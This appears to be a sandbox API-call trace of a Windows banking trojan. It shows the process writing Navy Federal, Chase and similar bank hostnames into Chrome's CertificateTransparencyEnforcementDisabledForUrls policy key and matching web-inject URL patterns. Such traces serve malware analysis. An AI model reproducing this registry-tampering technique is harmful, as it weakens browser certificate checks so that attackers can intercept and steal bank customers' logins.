	[0191.491] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1178fa0 | out: hHeap=0x260000) returned 1
	[0191.491] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1178f48 | out: hHeap=0x260000) returned 1
	[0191.491] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x50) returned 0x1178f48
	[0191.491] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1178f48 | out: hHeap=0x260000) returned 1
	[0191.491] strstr (_Str="https://myaccounts.navyfederal.org/NFCU/accounts/accountsummary*", _SubStr="https://") returned="https://myaccounts.navyfederal.org/NFCU/accounts/accountsummary*"
	[0191.491] strncpy (in: _Dest=0x1dfa58, _Source="myaccounts.navyfederal.org/NFCU/accounts/accountsummary*", _Count=0x1a | out: _Dest="myaccounts.navyfederal.orgcom") returned="myaccounts.navyfederal.orgcom"
	[0191.491] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.492] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x1191448
	[0191.492] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df764 | out: phkResult=0x1df764*=0x2a8) returned 0x0
	[0191.492] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df764, lpdwDisposition=0x0 | out: phkResult=0x1df764*=0x2b0, lpdwDisposition=0x0) returned 0x0
	[0191.492] RegSetValueExA (in: hKey=0x2b0, lpValueName="16", Reserved=0x0, dwType=0x1, lpData="myaccounts.navyfederal.org", cbData=0x1a | out: lpData="myaccounts.navyfederal.org") returned 0x0
	[0191.493] RegCloseKey (hKey=0x2b0) returned 0x0
	[0191.493] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.493] strstr (_Str="myaccounts.navyfederal.org", _SubStr="www.") returned 0x0
	[0191.493] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.493] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x1191470
	[0191.493] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1191470 | out: hHeap=0x260000) returned 1
	[0191.493] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.493] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.493] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.493] strstr (_Str="https://www.navyfederal.org/", _SubStr="https://") returned="https://www.navyfederal.org/"
	[0191.493] strncpy (in: _Dest=0x1dfa58, _Source="www.navyfederal.org/", _Count=0x13 | out: _Dest="www.navyfederal.orgral.org") returned="www.navyfederal.orgral.org"
	[0191.493] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.493] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x1191470
	[0191.493] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df764 | out: phkResult=0x1df764*=0x2ac) returned 0x0
	[0191.493] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df764, lpdwDisposition=0x0 | out: phkResult=0x1df764*=0x2b4, lpdwDisposition=0x0) returned 0x0
	[0191.493] RegSetValueExA (in: hKey=0x2b4, lpValueName="17", Reserved=0x0, dwType=0x1, lpData="www.navyfederal.org", cbData=0x13 | out: lpData="www.navyfederal.org") returned 0x0
	[0191.494] RegCloseKey (hKey=0x2b4) returned 0x0
	[0191.494] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.494] strstr (_Str="www.navyfederal.org", _SubStr="www.") returned="www.navyfederal.org"
	[0191.495] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df764 | out: phkResult=0x1df764*=0x2b0) returned 0x0
	[0191.495] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df764, lpdwDisposition=0x0 | out: phkResult=0x1df764*=0x2b8, lpdwDisposition=0x0) returned 0x0
	[0191.495] RegSetValueExA (in: hKey=0x2b8, lpValueName="18", Reserved=0x0, dwType=0x1, lpData="navyfederal.org", cbData=0xf | out: lpData="navyfederal.org") returned 0x0
	[0191.496] RegCloseKey (hKey=0x2b8) returned 0x0
	[0191.496] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x117c340
	[0191.496] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x117c4f0
	[0191.496] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117c4f0 | out: hHeap=0x260000) returned 1
	[0191.496] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117c340 | out: hHeap=0x260000) returned 1
	[0191.496] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x117c340
	[0191.496] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117c340 | out: hHeap=0x260000) returned 1
	[0191.496] strstr (_Str="https://my.navyfederal.org/NFOAA_Auth/login.jsp*", _SubStr="https://") returned="https://my.navyfederal.org/NFOAA_Auth/login.jsp*"
	[0191.496] strncpy (in: _Dest=0x1dfa58, _Source="my.navyfederal.org/NFOAA_Auth/login.jsp*", _Count=0x12 | out: _Dest="my.navyfederal.orgg") returned="my.navyfederal.orgg"
	[0191.496] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.496] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x1191498
	[0191.496] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df764 | out: phkResult=0x1df764*=0x2b4) returned 0x0
	[0191.496] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df764, lpdwDisposition=0x0 | out: phkResult=0x1df764*=0x2bc, lpdwDisposition=0x0) returned 0x0
	[0191.496] RegSetValueExA (in: hKey=0x2bc, lpValueName="19", Reserved=0x0, dwType=0x1, lpData="my.navyfederal.org", cbData=0x12 | out: lpData="my.navyfederal.org") returned 0x0
	[0191.497] RegCloseKey (hKey=0x2bc) returned 0x0
	[0191.497] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.497] strstr (_Str="my.navyfederal.org", _SubStr="www.") returned 0x0
	[0191.497] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.497] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x11914c0
	[0191.497] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11914c0 | out: hHeap=0x260000) returned 1
	[0191.497] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.497] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.497] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.497] strstr (_Str="*/rcrd/1527784817476992*", _SubStr="https://") returned 0x0
	[0191.497] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x117c340
	[0191.497] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x117c4f0
	[0191.497] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117c4f0 | out: hHeap=0x260000) returned 1
	[0191.497] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117c340 | out: hHeap=0x260000) returned 1
	[0191.498] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x117c340
	[0191.498] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117c340 | out: hHeap=0x260000) returned 1
	[0191.498] strstr (_Str="https://chaseonline.chase.com/secure/CustomerCenter*", _SubStr="https://") returned="https://chaseonline.chase.com/secure/CustomerCenter*"
	[0191.498] strncpy (in: _Dest=0x1dfa58, _Source="chaseonline.chase.com/secure/CustomerCenter*", _Count=0x15 | out: _Dest="chaseonline.chase.coml.org") returned="chaseonline.chase.coml.org"
	[0191.498] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.498] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x2a0) returned 0x1175330
	[0191.498] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x3282e0 | out: hHeap=0x260000) returned 1
	[0191.498] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x11914c0
	[0191.498] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df764 | out: phkResult=0x1df764*=0x2b8) returned 0x0
	[0191.498] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df764, lpdwDisposition=0x0 | out: phkResult=0x1df764*=0x2c0, lpdwDisposition=0x0) returned 0x0
	[0191.498] RegSetValueExA (in: hKey=0x2c0, lpValueName="20", Reserved=0x0, dwType=0x1, lpData="chaseonline.chase.com", cbData=0x15 | out: lpData="chaseonline.chase.com") returned 0x0
	[0191.499] RegCloseKey (hKey=0x2c0) returned 0x0
	[0191.499] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.499] strstr (_Str="chaseonline.chase.com", _SubStr="www.") returned 0x0
	[0191.499] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x11750e8
	[0191.499] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x1174f28
	[0191.499] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1174f28 | out: hHeap=0x260000) returned 1
	[0191.499] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11750e8 | out: hHeap=0x260000) returned 1
	[0191.499] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x11750e8
	[0191.499] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11750e8 | out: hHeap=0x260000) returned 1
	[0191.499] strstr (_Str="https://espanol.chase.com/sdchaseonline/Logon*", _SubStr="https://") returned="https://espanol.chase.com/sdchaseonline/Logon*"
	[0191.499] strncpy (in: _Dest=0x1dfa58, _Source="espanol.chase.com/sdchaseonline/Logon*", _Count=0x11 | out: _Dest="espanol.chase.com.com") returned="espanol.chase.com.com"
	[0191.499] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.500] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df764 | out: phkResult=0x1df764*=0x2bc) returned 0x0
	[0191.500] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df764, lpdwDisposition=0x0 | out: phkResult=0x1df764*=0x2c4, lpdwDisposition=0x0) returned 0x0
	[0191.500] RegSetValueExA (in: hKey=0x2c4, lpValueName="21", Reserved=0x0, dwType=0x1, lpData="espanol.chase.com", cbData=0x11 | out: lpData="espanol.chase.com") returned 0x0
	[0191.501] RegCloseKey (hKey=0x2c4) returned 0x0
	[0191.501] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.501] strstr (_Str="espanol.chase.com", _SubStr="www.") returned 0x0
	[0191.501] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x11750e8
	[0191.501] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x1174f28
	[0191.501] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1174f28 | out: hHeap=0x260000) returned 1
	[0191.501] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11750e8 | out: hHeap=0x260000) returned 1
	[0191.501] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x11750e8
	[0191.501] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11750e8 | out: hHeap=0x260000) returned 1
	[0191.501] strstr (_Str="https://chaseonline.chase.com/MyAccount*", _SubStr="https://") returned="https://chaseonline.chase.com/MyAccount*"
	[0191.501] strncpy (in: _Dest=0x1dfa58, _Source="chaseonline.chase.com/MyAccount*", _Count=0x15 | out: _Dest="chaseonline.chase.com") returned="chaseonline.chase.com"
	[0191.501] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.501] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df764 | out: phkResult=0x1df764*=0x2c0) returned 0x0
	[0191.501] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df764, lpdwDisposition=0x0 | out: phkResult=0x1df764*=0x2c8, lpdwDisposition=0x0) returned 0x0
	[0191.501] RegSetValueExA (in: hKey=0x2c8, lpValueName="22", Reserved=0x0, dwType=0x1, lpData="secure", cbData=0x6 | out: lpData="secure") returned 0x0
	[0191.502] RegCloseKey (hKey=0x2c8) returned 0x0
	[0191.502] strstr (_Str="secure", _SubStr="www.") returned 0x0
	[0191.502] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x117c340
	[0191.502] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x117c4f0
	[0191.502] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117c4f0 | out: hHeap=0x260000) returned 1
	[0191.502] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117c340 | out: hHeap=0x260000) returned 1
	[0191.502] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x117c340
	[0191.502] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117c340 | out: hHeap=0x260000) returned 1
	[0191.502] strstr (_Str="https://espanol.chase.com/sdchaseonline/secure/CustomerCenter*", _SubStr="https://") returned="https://espanol.chase.com/sdchaseonline/secure/CustomerCenter*"
	[0191.502] strncpy (in: _Dest=0x1dfa58, _Source="espanol.chase.com/sdchaseonline/secure/CustomerCenter*", _Count=0x11 | out: _Dest="espanol.chase.com") returned="espanol.chase.com"
	[0191.502] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.502] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df764 | out: phkResult=0x1df764*=0x2c4) returned 0x0
	[0191.503] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df764, lpdwDisposition=0x0 | out: phkResult=0x1df764*=0x2cc, lpdwDisposition=0x0) returned 0x0
	[0191.503] RegSetValueExA (in: hKey=0x2cc, lpValueName="23", Reserved=0x0, dwType=0x1, lpData="m.chase.com", cbData=0xb | out: lpData="m.chase.com") returned 0x0
	[0191.504] RegCloseKey (hKey=0x2cc) returned 0x0
	[0191.504] strstr (_Str="m.chase.com", _SubStr="www.") returned 0x0
	[0191.504] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.504] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x1191510
	[0191.504] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1191510 | out: hHeap=0x260000) returned 1
	[0191.504] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.504] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.504] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.504] strstr (_Str="https://www.chase.com/espanol", _SubStr="https://") returned="https://www.chase.com/espanol"
	[0191.504] strncpy (in: _Dest=0x1dfa58, _Source="www.chase.com/espanol", _Count=0xd | out: _Dest="www.chase.comhase.com") returned="www.chase.comhase.com"
	[0191.504] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df764 | out: phkResult=0x1df764*=0x2c8) returned 0x0
	[0191.504] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df764, lpdwDisposition=0x0 | out: phkResult=0x1df764*=0x2d0, lpdwDisposition=0x0) returned 0x0
	[0191.504] RegSetValueExA (in: hKey=0x2d0, lpValueName="24", Reserved=0x0, dwType=0x1, lpData="www.chase.com", cbData=0xd | out: lpData="www.chase.com") returned 0x0
	[0191.505] RegCloseKey (hKey=0x2d0) returned 0x0
	[0191.505] strstr (_Str="www.chase.com", _SubStr="www.") returned="www.chase.com"
	[0191.505] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df764 | out: phkResult=0x1df764*=0x2cc) returned 0x0
	[0191.505] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df764, lpdwDisposition=0x0 | out: phkResult=0x1df764*=0x2d4, lpdwDisposition=0x0) returned 0x0
	[0191.505] RegSetValueExA (in: hKey=0x2d4, lpValueName="25", Reserved=0x0, dwType=0x1, lpData="chase.com", cbData=0x9 | out: lpData="chase.com") returned 0x0
	[0191.506] RegCloseKey (hKey=0x2d4) returned 0x0
	[0191.506] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.506] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x1191510
	[0191.506] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1191510 | out: hHeap=0x260000) returned 1
	[0191.506] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.506] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.506] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.506] strstr (_Str="https://www.chase.com/", _SubStr="https://") returned="https://www.chase.com/"
	[0191.506] strncpy (in: _Dest=0x1dfa58, _Source="www.chase.com/", _Count=0xd | out: _Dest="www.chase.com") returned="www.chase.com"
	[0191.507] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x117c4f0
	[0191.507] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117c4f0 | out: hHeap=0x260000) returned 1
	[0191.507] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117c340 | out: hHeap=0x260000) returned 1
	[0191.507] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x117c340
	[0191.507] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117c340 | out: hHeap=0x260000) returned 1
	[0191.507] strstr (_Str="https://secure*.chase.com/web/auth/?fromOrigin=*", _SubStr="https://") returned="https://secure*.chase.com/web/auth/?fromOrigin=*"
	[0191.507] strncpy (in: _Dest=0x1dfa58, _Source="secure*.chase.com/web/auth/?fromOrigin=*", _Count=0x6 | out: _Dest="securease.com") returned="securease.com"
	[0191.507] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df764 | out: phkResult=0x1df764*=0x2d0) returned 0x0
	[0191.507] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df764, lpdwDisposition=0x0 | out: phkResult=0x1df764*=0x2d8, lpdwDisposition=0x0) returned 0x0
	[0191.507] RegSetValueExA (in: hKey=0x2d8, lpValueName="26", Reserved=0x0, dwType=0x1, lpData="web", cbData=0x3 | out: lpData="web") returned 0x0
	[0191.508] RegCloseKey (hKey=0x2d8) returned 0x0
	[0191.508] strstr (_Str="web", _SubStr="www.") returned 0x0
	[0191.508] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.508] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x1191510
	[0191.508] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1191510 | out: hHeap=0x260000) returned 1
	[0191.508] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.508] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.508] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.508] strstr (_Str="*/rcrd/1543511555715803*", _SubStr="https://") returned 0x0
	[0191.508] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.508] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x1191510
	[0191.508] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1191510 | out: hHeap=0x260000) returned 1
	[0191.508] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.508] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.508] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.508] strstr (_Str="*banking.haspa.de/*OF", _SubStr="https://") returned 0x0
	[0191.508] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.508] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x1191510
	[0191.508] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1191510 | out: hHeap=0x260000) returned 1
	[0191.508] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.508] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.508] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.508] strstr (_Str="*haspa.de/*/login", _SubStr="https://") returned 0x0
	[0191.508] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.508] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x1191510
	[0191.508] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1191510 | out: hHeap=0x260000) returned 1
	[0191.508] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.508] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.508] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.508] strstr (_Str="*haspa.de/*/welcome", _SubStr="https://") returned 0x0
	[0191.508] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.509] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x1191510
	[0191.509] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1191510 | out: hHeap=0x260000) returned 1
	[0191.509] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.509] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.509] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.509] strstr (_Str="*/rcrd/1553700641298959*", _SubStr="https://") returned 0x0
	[0191.509] strstr (_Str="*iccu.com*", _SubStr="https://") returned 0x0
	[0191.509] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.509] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x1191510
	[0191.509] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1191510 | out: hHeap=0x260000) returned 1
	[0191.509] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.509] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.509] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.509] strstr (_Str="*/rcrd/1547738007155673*", _SubStr="https://") returned 0x0
	[0191.509] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x11750e8
	[0191.509] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x1174f28
	[0191.509] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1174f28 | out: hHeap=0x260000) returned 1
	[0191.509] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11750e8 | out: hHeap=0x260000) returned 1
	[0191.509] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x11750e8
	[0191.509] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11750e8 | out: hHeap=0x260000) returned 1
	[0191.509] strstr (_Str="*/iytdr56ygc567ygtyhgyukiu654efgh/*", _SubStr="https://") returned 0x0
	[0191.509] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.509] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x1191510
	[0191.509] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1191510 | out: hHeap=0x260000) returned 1
